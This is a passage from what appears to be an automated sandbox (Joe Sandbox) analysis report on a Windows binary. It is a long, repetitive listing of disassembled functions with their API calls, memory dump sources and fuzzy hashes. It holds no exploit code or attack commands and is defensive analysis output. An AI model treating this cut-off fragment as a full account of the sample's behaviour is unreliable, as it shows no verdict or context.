                                                                                                                                                                                                                                    • Part of subcall function 009FE6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009FD7CD,?), ref: 009FE714
                                                                                                                                                                                                                                    • Part of subcall function 009FE6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009FD7CD,?), ref: 009FE72D
                                                                                                                                                                                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 009FD7F0
                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 009FD82A
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FD8B0
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 009FD8C6
                                                                                                                                                                                                                                  • SHFileOperationW.SHELL32(?), ref: 009FD90C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                  • API String ID: 3164238972-1173974218
                                                                                                                                                                                                                                  • Opcode ID: ec9686c870e6144116a3b8950e825cdeb9731a015e1f9692d057f67b9639e140
                                                                                                                                                                                                                                  • Instruction ID: 2f4653f5ebabf068aef34ab760a258886345f7bd0555fd6cec5d079fd501f00c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ec9686c870e6144116a3b8950e825cdeb9731a015e1f9692d057f67b9639e140
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FC41997180621C9EDF12EFA4D985BED77BDAF48380F1004E6E605EB152EB34A788CB50
                                                                                                                                                                                                                                  Function 00A23899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00A238B8
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A238EB
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A23920
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00A23952
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00A2397C
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A2398D
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00A239A7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                                                                                                  • Opcode ID: 13c465dd9c3fb130cf74ca287f0761403dba9def69bf7f1a99059035e07a3077
                                                                                                                                                                                                                                  • Instruction ID: 2ffef8bc585933ad801706a9374ca1541f12e771c67fe410f59d63cf9d65e2ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 13c465dd9c3fb130cf74ca287f0761403dba9def69bf7f1a99059035e07a3077
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3310532604265AFDB21CF9CEC95F6437A1EB87710F1501B4F5149B2B2CBB9A986DB01
                                                                                                                                                                                                                                  Function 009F808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009F80D0
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009F80F6
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 009F80F9
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 009F8117
                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 009F8120
                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 009F8145
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 009F8153
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                                                                                  • Opcode ID: a43813579ea89caf313cd9aaf333edb408f2246c340aecb0a6970fbce259678b
                                                                                                                                                                                                                                  • Instruction ID: f49915af2c6774745b3abc03389b9c0616bdcd37e191f8b213c3e6d9835125de
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a43813579ea89caf313cd9aaf333edb408f2246c340aecb0a6970fbce259678b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0121957260421DAF9F60EFA8CC84DBB77ACEB093647048525FA05DB291DB74EC478760
                                                                                                                                                                                                                                  Function 009F8164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009F81A9
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 009F81CF
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(00000000), ref: 009F81D2
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32 ref: 009F81F3
                                                                                                                                                                                                                                  • SysFreeString.OLEAUT32 ref: 009F81FC
                                                                                                                                                                                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 009F8216
                                                                                                                                                                                                                                  • SysAllocString.OLEAUT32(?), ref: 009F8224
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3761583154-0
                                                                                                                                                                                                                                  • Opcode ID: 09b38d15353053f07bb5336df768bd514c4f6fe9248e7228dbf53e53d4a4e5b2
                                                                                                                                                                                                                                  • Instruction ID: 0b06fa4bbdce44209f2dbdd6e4f0e5c51569962f0c0833365ceca540721da4fb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 09b38d15353053f07bb5336df768bd514c4f6fe9248e7228dbf53e53d4a4e5b2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F217171604208BF9B50EBECDC89DBB77ECEB493607048125FA15CB2A1DA74EC42CB64
                                                                                                                                                                                                                                  Function 00A00E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00A00E99
                                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A00ED5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                                                                                                                                  • String ID: nul
                                                                                                                                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                  • Opcode ID: 0c9620e0cbfef6aa0f14ae3d26a746df9bf8da69e24cf608c5fb4c5a44b7a5e7
                                                                                                                                                                                                                                  • Instruction ID: 7d9e6c9de21a4307bb1307a89f452965670e1fa7abedcecb3ad245d6d1ea4bb9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c9620e0cbfef6aa0f14ae3d26a746df9bf8da69e24cf608c5fb4c5a44b7a5e7
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2214B7050030AABDB308F68E805FAA77A8BF55760F204A29FCA5E72D0D770A851DB50
                                                                                                                                                                                                                                  Function 00A00F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00A00F6D
                                                                                                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00A00FA8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateHandlePipe
                                                                                                                                                                                                                                  • String ID: nul
                                                                                                                                                                                                                                  • API String ID: 1424370930-2873401336
                                                                                                                                                                                                                                  • Opcode ID: c89946b081808ce2ef8e2abfb12bb1dda26f45de60ed714253e453553d76fc46
                                                                                                                                                                                                                                  • Instruction ID: 7b749b2e718541c844b2d5d2a36c70ee8d6a05a8a45adec3932352b2c0f11082
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c89946b081808ce2ef8e2abfb12bb1dda26f45de60ed714253e453553d76fc46
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C821517160034AEBDB309F68AC04EDA77A8BF55724F200A19F8E1E72D1D7719981DB50
                                                                                                                                                                                                                                  Function 00A24B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00997873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 009978B1
                                                                                                                                                                                                                                    • Part of subcall function 00997873: GetStockObject.GDI32(00000011), ref: 009978C5
                                                                                                                                                                                                                                    • Part of subcall function 00997873: SendMessageW.USER32(00000000,00000030,00000000), ref: 009978CF
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00A24BB0
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00A24BBD
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00A24BC8
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00A24BD7
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00A24BE3
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                                                                                                                                                                                  • String ID: Msctls_Progress32
                                                                                                                                                                                                                                  • API String ID: 1025951953-3636473452
                                                                                                                                                                                                                                  • Opcode ID: 1f473f1ad7fe89d57cad94dbdeb67eec670e418cfb194c8c9415c8ca5ac50f4f
                                                                                                                                                                                                                                  • Instruction ID: 6985e3200d7d1c8252e873e270fec7f1e521bf4031f695fc7dc1951039c97449
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1f473f1ad7fe89d57cad94dbdeb67eec670e418cfb194c8c9415c8ca5ac50f4f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F71193B1150219BEEF118FA5DC85EEB7F6DEF08798F014120BA08A2050CA75DC219BA0
                                                                                                                                                                                                                                  Function 009CDB5F Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 009CDB23: _free.LIBCMT ref: 009CDB4C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDBAD
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4), ref: 009C2D4E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: GetLastError.KERNEL32(00A61DC4,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4,00A61DC4), ref: 009C2D60
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDBB8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDBC3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDC17
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDC22
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDC2D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009CDC38
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                  • Instruction ID: b9ffce512481ae1a848e99e809b67df36aa5a3677dc1a44c1c8e37692f8769ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98b13fc91f4fe31fecb0273d364a71dd69e1171f55120a532e903f65f4669862
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11115172D42B04BAD624BBB0DC07FCB77EC9F95700F410C2DB29AAA193DA75F9448652
                                                                                                                                                                                                                                  Function 009FE30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 009FE328
                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 009FE32F
                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 009FE345
                                                                                                                                                                                                                                  • LoadStringW.USER32(00000000), ref: 009FE34C
                                                                                                                                                                                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 009FE390
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 009FE36D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: HandleLoadModuleString$Message
                                                                                                                                                                                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                  • API String ID: 4072794657-3128320259
                                                                                                                                                                                                                                  • Opcode ID: c000e6f2dba945375a5f6a71ac0d4c46e38baf97d83611e37661e8eb45775448
                                                                                                                                                                                                                                  • Instruction ID: 6fd8c12adb4a16f07fda215119a03466958b9aed1f0d578aa5d2b6007c285825
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c000e6f2dba945375a5f6a71ac0d4c46e38baf97d83611e37661e8eb45775448
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B0136F690021C7FE721D7E89D89EFB776CE708301F0045A1B74AE6052E6749E864B75
                                                                                                                                                                                                                                  Function 00A01312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00A01322
                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00000000,?), ref: 00A01334
                                                                                                                                                                                                                                  • TerminateThread.KERNEL32(00000000,000001F6), ref: 00A01342
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00A01350
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00A0135F
                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00A0136F
                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000000), ref: 00A01376
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                                                                                                  • Opcode ID: 5ce296d83d8b2339260c7f6f7c5926d070a1e3f79aa841639ec6cd6775804f5e
                                                                                                                                                                                                                                  • Instruction ID: 16e9387db8db5edd9847c92256bf04ef65ddb97747cbb8c987e539a0c17d85df
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ce296d83d8b2339260c7f6f7c5926d070a1e3f79aa841639ec6cd6775804f5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 63F0EC32042612FBD7619B98EE89BE6BB39FF04302F402131F201958A187749473CFD1
                                                                                                                                                                                                                                  Function 00A126BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00A1281D
                                                                                                                                                                                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00A1283E
                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00A1284F
                                                                                                                                                                                                                                  • htons.WSOCK32(?,?,?,?,?), ref: 00A12938
                                                                                                                                                                                                                                  • inet_ntoa.WSOCK32(?), ref: 00A128E9
                                                                                                                                                                                                                                    • Part of subcall function 009F433E: _strlen.LIBCMT ref: 009F4348
                                                                                                                                                                                                                                    • Part of subcall function 00A13C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00A0F669), ref: 00A13C9D
                                                                                                                                                                                                                                  • _strlen.LIBCMT ref: 00A12992
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3203458085-0
                                                                                                                                                                                                                                  • Opcode ID: 81679eacca3a08b67c2c4dd172e35779527ab3df715dd0e2b0898081b02f9a8e
                                                                                                                                                                                                                                  • Instruction ID: edd6331147582fa2bdf3bb6ca3796794c276abc7153d443dc51e316536951fc4
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81679eacca3a08b67c2c4dd172e35779527ab3df715dd0e2b0898081b02f9a8e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75B10375604300AFD724DF28C885F6ABBE5AF84318F54855CF49A4B2E2DB31ED86CB91
                                                                                                                                                                                                                                  Function 009C0527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
